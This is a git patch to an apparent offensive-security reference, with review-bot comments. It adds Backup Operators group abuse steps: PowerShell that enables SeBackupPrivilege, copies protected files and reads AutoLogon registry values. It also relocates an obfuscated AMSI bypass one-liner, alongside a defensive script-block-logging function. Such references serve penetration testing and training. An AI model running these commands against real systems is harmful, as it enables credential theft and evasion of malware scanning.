From 36e135776fbd4a9824adab5966f3b85a1b322585 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 14 Feb 2023 15:13:41 +0100 Subject: [PATCH] AD Groups + PowerShell Defenses --- .../Active Directory Attack.md | 47 +++++++++++++++- .../Windows - Defenses.md | 55 ++++++++++++++----- 2 files changed, 85 insertions(+), 17 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3f83ebd..14d410a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -92,8 +92,11 @@ - [ADFS - Golden SAML](#adfs---golden-saml) - [UnPAC The Hash](#unpac-the-hash) - [Shadow Credentials](#shadow-credentials) - - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - - [Abusing DNS Admins Group](#abusing-dns-admins-group) + - [Active Directory Groups](#active-directory-groups) + - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) + - [Abusing DNS Admins Group](#abusing-dns-admins-group) + - [Abusing Schema Admins Group](#abusing-schema-admins-group) + - [Abusing Backup Operators Group](#abusing-backup-operators-group) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) - [GenericAll](#genericall) - [GenericWrite](#genericwrite) @@ -2854,6 +2857,7 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab ``` +## Active Directory Groups ### Dangerous Built-in Groups Usage 
@@ -2927,6 +2931,42 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount sc \\dc01 start dns ``` +### Abusing Schema Admins Group + +> The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory. + + +### Abusing Backup Operators Group + +> Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers. + +This groups grants the following privileges : +- SeBackup privileges +- SeRestore privileges + +* Get members of the group: + ```ps1 + PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse + ``` +* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege) + ```ps1 + Import-Module .\SeBackupPrivilegeUtils.dll + Import-Module .\SeBackupPrivilegeCmdLets.dll + + Set-SeBackupPrivilege + Get-SeBackupPrivilege + ``` +* Retrieve sensitive files + ```ps1 + Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite + ``` +* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive + ```ps1 + $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64) + $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') + $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"} + ``` + ### Abusing Active Directory 
ACLs/ACEs @@ -4191,4 +4231,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) * [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) * [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/) -* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) \ No newline at end of file +* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) +* [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Defenses.md b/Methodology and Resources/Windows - Defenses.md index 108b68c..4a58201 100644 --- a/Methodology and Resources/Windows - Defenses.md +++ b/Methodology and Resources/Windows - Defenses.md 
@@ -2,26 +2,17 @@ ## Summary -* [AMSI](#amsi) * [AppLocker](#applocker) * [DPAPI](#dpapi) * [Powershell](#powershell) - * [JEA](#jea) + * [Anti Malware Scan Interface](#anti-malware-scan-interface) + * [Just Enough Administration](#just-enough-administration) * [Contrained Language Mode](#constrained-language-mode) + * [Script Block Logging](#script-block-logging) * [Windows Defender Antivirus](#windows-defender-antivirus) * [Windows Defender Application Control](#windows-defender-application-control) * [Windows Defender Firewall](#windows-defender-firewall) -## AMSI - -> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content. - -Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) - -```powershell -PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) -``` - ## AppLocker 
@@ -48,7 +39,18 @@ Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrep ## Powershell -### JEA +### Anti Malware Scan Interface + +> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content. + +Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) + +```powershell +PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) +``` + + +### Just Enough Administration > Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information. @@ -62,6 +64,7 @@ Breaking out if JEA: Add-Computer ``` + ### Constrained Language Mode Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode` 
@@ -110,6 +113,29 @@ Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageM ``` +### Script Block Logging + +> Once Script Block Logging is enabled, the script blocks and commands that are executed will be recorded in the Windows event log under the "Windows PowerShell" channel. To view the logs, administrators can use the Event Viewer application and navigate to the "Windows PowerShell" channel. + +Enable Script Block Loggin: + +```ps1 +function Enable-PSScriptBlockLogging +{ + $basePath = 'HKLM:\Software\Policies\Microsoft\Windows' + + '\PowerShell\ScriptBlockLogging' + + if(-not (Test-Path $basePath)) + { + $null = New-Item $basePath -Force + } + + Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1" +} +``` + + + ## Windows Defender Antivirus Also known as `Microsoft Defender`. @@ -186,4 +212,5 @@ Also known as `WDAC/UMCI/Device Guard`. ## References -* [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf) \ No newline at end of file +* [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf) +* [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3) \ No newline at end of file
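Review bot: In the `Active Directory Attack.md` hunk at `@@ -2854`, the new `## Active Directory Groups` heading is inserted directly above `### Dangerous Built-in Groups Usage` with no blank line between the two headings; the rest of the file separates headings with a blank line, so add one here for consistency (and so that Markdown renderers that require it do not fold the two lines together).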
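Review bot: In the Backup Operators hunk at `@@ -2927`, `This groups grants the following privileges :` should read `This group grants the following privileges:` (singular, no space before the colon), and the two bullets should name the privileges as Windows does, `SeBackupPrivilege` and `SeRestorePrivilege`, rather than "SeBackup privileges". The same hunk mixes `-` and `*` bullets within one section; pick one. The new `### Abusing Schema Admins Group` section is a stub: it contains only a block quote and no commands, checks or references, so either add the content or leave the heading out of this commit so the TOC does not point at an empty section. Both block quotes read as verbatim documentation text but carry no source; add a citation under each. Finally, `'dc.htb.local'` in the `OpenRemoteBaseKey` call is a lab-specific hostname; replacing it with an obvious placeholder such as `<DC_HOSTNAME>` matches how the rest of the file presents targets.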
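Review bot: The references hunk at `@@ -4191` in `Active Directory Attack.md` again ends with `\ No newline at end of file`; since the line is being rewritten anyway, terminate the file with a newline so the next reference added does not produce another spurious one-line diff.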
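Review bot: In the `Windows - Defenses.md` summary hunk at `@@ -2`, the new TOC entry `Anti Malware Scan Interface` is unhyphenated while the section body (and the product name) uses `Anti-Malware Scan Interface`; align the heading, the anchor and the TOC text. The unchanged context line `* [Contrained Language Mode](#constrained-language-mode)` has a typo in the link text (`Constrained`) that is worth fixing in the same pass since the surrounding list is being edited. Nesting AMSI under `Powershell` is also debatable: the quoted description in the moved section itself says AMSI is a unified interface for "applications and services", not a PowerShell feature, so either keep it top level or add a sentence explaining that this section covers only the PowerShell integration.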
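Review bot: In the hunk at `@@ -48` that moves AMSI under `## Powershell`, the only actionable content in a file named `Windows - Defenses.md` is the bypass one-liner; for a defenses page the section should at least state how a defender verifies AMSI is active and which products consume its scan results, and move or link the bypass material to the dedicated `Windows - AMSI Bypass.md` page that the section already references. The unchanged context line `Breaking out if JEA:` should read `Breaking out of JEA:`. Stylistically, the hunk introduces two blank lines before `### Just Enough Administration` and an extra blank line before `### Constrained Language Mode`; a single blank line between blocks is what the rest of the file uses.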
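Review bot: In the Script Block Logging hunk at `@@ -110`, the block quote states that script blocks are recorded "under the 'Windows PowerShell' channel", but the `about_Logging_Windows` page this same patch adds as a reference documents script block logging as event ID 4104 in the `Microsoft-Windows-PowerShell/Operational` log; correct the channel name and consider adding the matching view command, e.g. `Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' | Where-Object Id -eq 4104`, so the section shows both enabling and reading the logs. `Enable Script Block Loggin:` is missing a `g`. In `Enable-PSScriptBlockLogging`, `Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1"` writes a string when the value does not yet exist; adding `-Type DWord` (as `-Value 1 -Type DWord`) makes the key match what Group Policy writes and avoids a REG_SZ/REG_DWORD mismatch when the setting is later compared against policy. The hunk also leaves three blank lines before `## Windows Defender Antivirus`; one is enough.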
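Review bot: In the references hunk at `@@ -186` of `Windows - Defenses.md`, the file still ends with `\ No newline at end of file`; add the trailing newline while the last line is being touched. The new `about_Logging_Windows` link pins `?view=powershell-7.3`; dropping the `view` query string lets the link follow the current documentation version instead of going stale with the next PowerShell release.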